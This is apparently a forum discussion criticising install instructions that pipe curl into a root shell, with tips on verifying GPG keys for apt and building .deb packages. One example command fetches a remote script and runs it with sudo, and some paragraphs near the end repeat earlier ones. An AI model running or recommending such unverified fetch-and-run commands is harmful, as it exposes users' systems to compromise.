I hate this practice, no idea how it became commonplace. Of course lots of times, installation procedures can be long and tedious, but it takes one popular project's script server to be compromised, and tons of people are suddenly running malicious commands.
I would go through manually installing dependencies and setting up my system, adding repos, etc. over running some script any day. But then again some projects wouldn't be that popular if they were hard to install.
Some of npm's installation instructions ask you to pipe curl into bash, to run a lovely script [0] which makes things easier for you, but not by much. Is it really necessary? Would developers give up trying to get npm and node just because installing not as easy as "curl https://some.script.com/that-script.sh | sudo -E bash -; sudo apt-get install npm"?
Other than building/installing programs, adding GPG/SSH keys like in the blog post can be as dangerous, and while not simple, there could be some method built to make things easier without having to run commands you don't even check.
Look at it this way: whenever you are running a program you didn't write yourself, you're running a bunch of commands you never checked. This is no different to, say, downloading a precompiled executable and running it, with all the same problems and tradeoffs.
It is different. While it is obviously true that I haven't checked all of the binaries I'm running, I at least can, through the various signatures involved, rely on the fact that it was created by a particular individual or group, whom I may trust.
Would you really assign the same level of trust to, eg, a sudo(8) binary downloaded somewhere of the internet as you would to the one provided by your distribution?
That's not the comparison being made. It's between piping curl to bash, or just downloading a script and running it with sudo, without inspecting.
Yes, you "could inspect". But this is about the instructions. And instructions to pipe curl to bash are no more or less harmful than instructions to download a binary from a "random" server and run it verbatim.
"Piping curl to bash" is a red herring. It's "running unverified code" that's the problem. Piping curl to bash just makes it viscerally obvious how dangerous that is.
There are various levels of trust, of course. The packages in Debian or RedHat are more trustworthy (there is a process) than those in NPM or Maven (free-for-all, even if you have some assurance that the package you're downloading is the very same the developer uploaded).
But installing a random NPM package is no more dangerous than curl-piping a script from Github to bash over HTTPS (without -k). You're still sure that what you're downloading and running is what whoever is in control of that repo intended.
What IS more dangerous is training a generation of developers to solve problems by quickly copy-pasting random strangers' magic incantations from random blogs or Stackoverflow into their terminals. You could probably infect a large number of machines very quickly by stalking certain categories on Stackoverflow for "noob" questions and giving a good answer in the form of a GitHub gist curl-pipe to sudo that fixes the problem, but that also discreetly backdoors the target.
People are lazy, developers are people, most developers are not interested in process of system maintenance, so if something could be done fast and easy, they could care less about it. My colleague uses Windows 8 preinstalled on his laptop 5 years ago, it's slow as hell and ridden with all kinds of toolbars, but he doesn't want to make an effort of full reinstall. He would happily pipe curl to bash, actually I'm not even sure if he understands what curl or bash is, he knows some Java and JavaScript and that's enough to be paid.
I like tinkering with system, I reinstalled my home server may be 20 times, I'm always reinstalling macos from scratch when new version released, but honestly it's not very productive time spent, so I understand people who just want to get things done.
I think it's failure of current operating systems: installing software is still too hard and tedious. Opening terminal and copy-pasting strings is not a trivial activity. If one could install npm by pushing button in their website, they would do that instead.
This oh so much include the upsurge in containerization and the quagmire that is Linux distro package dependencies.
First of all, containerization allows for static linking via other means. Meaning that as the container holds everything a program needs to run in exactly the right versions, it produce what is practically the same as a static binary with the linked libs compiled in.
Similarly, package dependencies are a quagmire because package A may want lib B, while C wants B+1. And B+1 introduce some subtle (or overt) change that makes it unsuitable for A. This then result in a game of telephone with package and file names to try to get both B and B+1 to exist on a system at the same time. But there are no real conversion for how to settle these conflicts so each distro have their own rules and procedures.
But really the distros are trying to make the best of a bad situation brought on by lib and program developer laziness. Laziness whereby they do not properly check breakages before shipping, or simply grab the latest and shiniest that gets their job done rather than track down the lowest common denominator that is suitable.
It may be used, by developers, as an argument for containers. But that is just the same old lazy devs being their same old lazy self. Containers are not fixing the underlying problem.
I like very much this formalism to installation procedure description. Being curious and informed about the risks, I will not do a copy paste of curl ... | sudo .... I will do a curl to a temporary file, edit the file and if there is nothing fishy, I will copy the commands (from the file, not a browser) to a terminal.
If the content of the file is a very messy (or too long) script, I consider that the software will also be messy and does not deserve my time.
This formalism flatter my ego, proves transparency and makes me spare time. Full benefit. It is dangerous for noob, but is also a good opportunity to educate them.
> But then again some projects wouldn't be that popular if they were hard to install.
Slackware was my first distro back in 2007 and I still wish it had at the very least a decent installer and package manager, it is so well built but upgrading, and installing is just not as trivial when compared to Debian. I guess openSUSE (afaik) is the only remnant of Slackware that's usable - really loved openSUSE but just like every other distro in the world I have to dance to get my Wi-Fi working properly.
I've wasted several days trying to get programs I write turned into debs and rpms, I gave up. It's a single executable you can download and put wherever you like, or download the source and './configure.py; make'.
Also, I release new versions regularly, so now being in the official repositories is no good as they will get out of date, I have to run my own repositories, for several versions of ubuntu and redhat. No chance.
I have succeeded in turning my programs into DEBs and RPMs that also properly comply with all the distribution packaging guidelines, but it took me two months. I am now onboarding two other developers but they are struggling with making changes to DEBs and RPMs. All because of the complexity, archaic toolchain and poor documentation.
The only reason why we made DEBs and RPMs was to please users, but it's not an experience I want to recommend anyone.
> I've wasted several days trying to get programs I write turned into debs and rpms, I gave up.
The formats themselves are pretty easy to create; for a .deb you just:
- Make the folder hierarchy you want to include, e.g. things like `myBuildFolder/usr/bin/myProgram`
- Make a `myBuildFolder/DEBIAN/debian-binary` file containing `2.0`
- Make a `myBuildFolder/DEBIAN/control` file which contains e.g. the name of the package and its dependencies
- Run `dpkg-deb --build myBuildFolder`
This gives a .deb package which will be tracked by dpkg/apt, allowing clean removals/upgrades/etc. unlike `sudo make install` which will spray cruft all over the system. When I used Debian, I would install all software like this.
I've never made a .deb that's compliant with Debian's packaging policies though, since that does take a lot of effort.
Your example fetches the key from the keyserver without https. Fetching the key from the project's own site over https using curl is better.
Edited to add: Fetching from a keyserver is OKish if a) you use the long form of key id and b) your gpg is new enough that it checks that it got the key for the id it requested. Still, the Web page you copy the key id from is as vulnerable to an attack on the server as the server serving the key directly.
Right, sorry, it should be using hkps as protocol and leave out the port.
Especially when copying and pasting things anyway, the long form should always be preferred. I think there was an article on here several months ago on the dangers of using abbreviated fingerprints.
Manipulation of the fingerprint on the web page could be easier to detect using the archive.org wayback machine, which might not index the keyfile. Doesn't prevent manipulation but might make it easier to detect if you're suspicious.
hkp literally stands for HTTP keyserver protocol. Does your corporate proxy really mess up HTTP connections?
Why does it matter how apt-key is implemented? Its purpose is key management, and whether it uses bash for the job or perl or C is completely irrelevant. It's been in use for over a decade. Do you have any reason to suspect deficiencies in it just because it uses shell scripts?
> Consider the case where download.docker.com starts serving an evil key file
At that point I can't trust the key ID in the docker documentation either. Since Docker doesn't use web of trust (who does honestly?) there is no way that I can verify the key ID in any way in the provided key file. So I don't know how it does any good inspecting the key file before adding it to the apt keyring.
On piping anything from the Internet directly to your system for execution: Don't be lazy. Don't be an ass.
When I am working in a persona that responsible for managing a server or a service, I insist on knowing everything I need to know about how to keep that service and the environment in which it operates safe, alive, and providing usable performance.
I require good, clean and coherent instructions for deploying something at production level, where all required components and their preferred method of interaction are clearly explained and documented by the developer, and can be repeated in a predictable manner by me.
If all I have to work with is "pipe this to the shell, alternatively read the code" I'm going to go with "nah, I'll find something professional".
Time spent installing a system should be only a minuscule fraction of time spent actually operating the system. Spending a few extra hours doing it right shouldn't make a difference.
Actually, ideally GPG public keys would be small enough that they could be inlined with the script. Why is it that a SSH public key are on a single line but GPG have to be a page-full?
A GPG public key does not only consist of the integer number that forms the cryptographic public key, but usually you have multiple user IDs so other can recognize to whom this key belongs. In order to prove that these user ID belongs to this public key, each of them is signed. Obviously, that will take a few more bytes for the additional data and signature.
The exported file size also depends on the way you export the GPG public key. By default, you will also export all signatures made by others, but you can use `gpg --export --export-options=export-minimal` to strip everything except the last self-signature on each user ID.
Thinking about this I came up with the following. I tried getting the fingerprint in full but only got the short version. Not being a gpg-ninja it would suffice to make an offline version of the add command.
... and then you have to check the fingerprints manually, and delete the ones you don't want manually.
No, what would really solve this specific issue is allowing apt-key to add only a single key, and give it the expected fingerprint (as zimbatm explains)
> providing instructions on adding the key to apt-key
curl | apt-key - # that works
No really, they shouldn't tell you how to add the key to your store. If you don't know how to do that yourself, you shouldn't be admin/superuser. (Also, `man`)
Apt-key should just have a built-in way of importing keys from HTTP(s) URLs, preferably in interactive mode so you can confirm the keys are legitimate before adding them.
Of my first steps into the world of Linux this year, this sort of procedure has been one of the most glaringly disturbing. Another similar was packages being downloaded over HTTP.
Debian packages are signed, they are safe to transmit over http. See https://wiki.debian.org/SecureApt (which appears to have been written around the time of the transition, so it's out of date, e.g. SHA1 signatures are no longer trusted etc)
I would go through manually installing dependencies and setting up my system, adding repos, etc. over running some script any day. But then again some projects wouldn't be that popular if they were hard to install.
Some of npm's installation instructions ask you to pipe curl into bash, to run a lovely script [0] which makes things easier for you, but not by much. Is it really necessary? Would developers give up trying to get npm and node just because installing not as easy as "curl https://some.script.com/that-script.sh | sudo -E bash -; sudo apt-get install npm"?
Other than building/installing programs, adding GPG/SSH keys like in the blog post can be as dangerous, and while not simple, there could be some method built to make things easier without having to run commands you don't even check.
Anyways, hope projects grow out of this habit.
[0] https://deb.nodesource.com/setup_6.x